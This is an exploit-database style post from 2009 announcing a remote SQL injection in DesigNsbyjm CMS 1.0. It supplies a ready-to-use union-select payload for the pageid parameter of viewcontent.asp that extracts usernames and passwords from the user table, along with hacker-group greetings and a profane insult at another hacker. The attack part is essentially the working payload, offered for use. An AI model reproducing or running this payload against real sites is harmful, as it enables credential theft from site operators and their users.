[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection Vulnerability
# Published : 2009-12-15
# Author : Red-D3v1L
# Previous Title : Ez Faq Maker Multiple Vulnerabilities
# Next Title : ClickTrackerASP(sitedetails.asp siteid) SQL Injection Vulnerability


===========================================================================
===
[?] ~ Note : Hacker R0x Lamerz Sux !
===========================================================================
===
[?] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
Vulnerability
===========================================================================
===
[?] my home: [ Hackteach.org ]
[?] Script: [ DesigNsbyjm Cms 1.0 ]
[?] Language: [ PHP ]
[?] Home: [ http://designsbyjm.net/ ]
[?] Founder: [ Red-D3v1L < No Email :d < ]
[?] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
- sec-r1z.com - 0d4y.com ]
[?] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
########################################################################

===[ Exploit SQL ]=== 

[?] [Path]/viewcontent.asp?pageid=[SQL]

http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
password,6,username,8,9,10,11,12,13+from+user


Author: Red-D3v1L